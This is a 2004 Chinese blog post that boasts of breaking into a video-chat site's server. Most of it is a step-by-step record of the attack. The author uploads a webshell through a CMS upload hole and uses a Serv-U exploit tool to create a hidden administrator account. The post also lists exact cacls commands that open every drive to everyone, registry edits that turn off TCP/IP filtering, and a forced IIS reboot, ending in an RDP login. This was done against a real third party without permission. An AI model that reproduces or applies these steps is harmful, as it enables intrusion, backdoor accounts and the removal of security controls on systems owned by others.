CSDN博客

img dcboy

突破TCP/IP筛选到3389终端登陆

发表于2004/12/29 3:07:00  1084人阅读

一:得到webshell
今天晚上的一次小小测试,由于本人太菜,再高深的技术我也不会,只能这样了..........
一切都已经过去了,没有办法补图了,希望能看的懂这个小帖子。
今天有是无聊的一天,晚上实在无聊没有事情干,就到一个视频聊天站点看秀,嘿嘿~
突然发现一个聊天室特别的火暴,人数已经有500人在里面了(满员了),刷了n次也没有进去..........更加郁闷了!:(
想想反正也是没有事情做,测试一下主机安全做的怎么样吧,呵呵(太菜,说测试人家安全实在是抬高自己了)
在cmd下ping了一下得到了对方的ip,然后登陆
http://whois.webhosting.info/对方ip看看有没有其他的站点,哈,这下发了,上面有几十个站点,估计我还是能找到一个两个带漏洞的站点的`
经过漫长的查找,终于找到一个动易带漏洞的页面
http://www.xxxx.net/Upfile_Soft.asp,上传一个webshell(海阳2005正式版)先(怎么上传我就不罗嗦了,上传工具现在漫天飘了)。

二:成功提升权限建立用户
拿到webshell后高高兴兴的登陆了,突然发现什么权限都没有,只能在自己的webshell所在的目录里面打转(c.d.e.f盘都浏览不了),连删除文件的权限都没有,郁闷呀........
回到〖Server〗下看看主机开了什么服务吧,经过发现他开了终端服务和serv-u服务,哈,这下有搞头了^_^用superscan扫描了一下他的ip,果然通过banner看出他是用的serv-u,版本5.0。
到〖Wscript.Shell〗下面试试看能执行cmd命令不能,输入net user后没有反映,再试通过Wscript.Shell能执行cmd命令不能,再次输入net user后执行返回了对方的user名单,哈哈,这下好了,能拿下了!!
上传serv-u提升工具到D:/a004/tggtwe/****.com/UploadSoft目录下面,改名为:test.exe,然后回到〖Wscript.Shell〗下执行命令去了,嘿嘿,马上一只肥鸡就要到手了,高兴ing~
通过Wscript.Shell执行cmd命令:
D:/a004/tggtwe/****.com/UploadSoft/test.exe "net user guest /active:yes" #激活guest账号,我喜欢用这个账号
D:/a004/tggtwe/****.com/UploadSoft/test.exe "net user guest lvhuana" #把guest账号的密码设定为lvhuana
D:/a004/tggtwe/****.com/UploadSoft/test.exe "net localgroup administrators guest /add" #提升guest权限到admin权限
好了,账号建立完毕,执行一下net localgroup administrators看看成功没,通过回显知道添加成功了。然后执行netstat -an后看到他开的终端端口是默认的3389,OK,连接试试~

三:解决TCP/IP筛选
连接不上!?晕...........再拿出superscan来扫一下他的3389,根本扫不到........(开了防火墙!?靠,我的点真背.....)
没有办法了,再次回到Wscript.Shell执行cmd命令:
D:/a004/tggtwe/****.com/UploadSoft/test.exe "cacls.exe c: /e /t /g everyone:F" #把c盘设置为everyone可以浏览
D:/a004/tggtwe/****.com/UploadSoft/test.exe "cacls.exe d: /e /t /g everyone:F" #把d盘设置为everyone可以浏览
D:/a004/tggtwe/****.com/UploadSoft/test.exe "cacls.exe e: /e /t /g everyone:F" #把e盘设置为everyone可以浏览
D:/a004/tggtwe/****.com/UploadSoft/test.exe "cacls.exe f: /e /t /g everyone:F" #把f盘设置为everyone可以浏览
这下最少可以遍历整个硬盘了,我在硬盘里面到处的翻,找遍了也没有找到他的防火墙文件,这下心里有数了,肯定是他进行TCP/IP筛选了!(当然也有是内网做服务器的可能,具体大家自己可以根据ipconfig -all来判断)
突破TCP/IP筛选我们可以更改他的注册表来实现,我们要做的就是导出他注册表的三处,更改后再导入就可以了,回到〖Wscript.Shell〗执行cmd命令:
D:/a004/tggtwe/****.com/UploadSoft/test.exe "regedit -e D:/a004/tggtwe/****.com/UploadSoft/1.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/Tcpip" #导出注册表里关于TCP/IP筛选的第一处
D:/a004/tggtwe/****.com/UploadSoft/test.exe "regedit -e D:/a004/tggtwe/****.com/UploadSoft/2.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet002/Services/Tcpip" #导出注册表里关于TCP/IP筛选的第二处
D:/a004/tggtwe/****.com/UploadSoft/test.exe "regedit -e D:/a004/tggtwe/****.com/UploadSoft/3.reg HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip" #导出注册表里关于TCP/IP筛选的第三处
然后回到〖Stream〗或〖FSO〗发现1.reg,2.reg,3.reg已经安静的躺在那里了,嘿嘿~
把1.reg,2.reg,3.reg下载回来到自己的硬盘里面编辑一下,把关于TCP/IP筛选的几个地方改一下,首先打开1.reg找到"EnableSecurityFilters"=dword:00000001把最后面的数字1改成0后保存,然后更改2.reg,3.reg,更改方法一样,我就不再罗嗦了~
然后我们把1.reg,2.reg,3.reg再上传回对方的机器里面(这里我们要选上覆盖模式,因为没有权限删除原来的1.reg,2.reg,3.reg),上传成功后再回到〖Wscript.Shell〗执行cmd命令:
D:/a004/tggtwe/****.com/UploadSoft/test.exe "regedit -s D:/a004/tggtwe/****.com/UploadSoft/1.reg" #安静模式下把我们修改完的1.reg导入到他的注册表
D:/a004/tggtwe/****.com/UploadSoft/test.exe "regedit -s D:/a004/tggtwe/****.com/UploadSoft/2.reg" #安静模式下把我们修改完的2.reg导入到他的注册表
D:/a004/tggtwe/****.com/UploadSoft/test.exe "regedit -s D:/a004/tggtwe/****.com/UploadSoft/3.reg" #安静模式下把我们修改完的3.reg导入到他的注册表
OK!导入后重新启动他的机器后在能解决TCP/IP筛选问题,再在〖Wscript.Shell〗执行cmd命令:
D:/a004/tggtwe/****.com/UploadSoft/test.exe "iisreset /reboot /timeout:00" #利用他自身的iis服务来重新启动他的机器,/timeout:00这个参数是让他立即重新启动
执行完后我们再用superscan已经扫不到他了,吼吼~已经重新启动了!

四:成功用终端登陆
经过漫长的等待后(其实时间不长,只是我在这里已经等不及了,嘿嘿~),终于可以用superscan扫到他了,并且可以扫到他的3389端口了,哈哈,终于成功了,拿出终端登陆器顺利的用我刚才建立的user:guest,pass:lvhuana登陆上了!
好了,这篇垃圾文章到此就该结束了,已经凌晨了,也该收工睡觉了~由于本人太菜,错误地方肯定在所难免,让大家见笑了,同时望大家指正!
0 0

相关博文

我的热门文章

img
取 消
img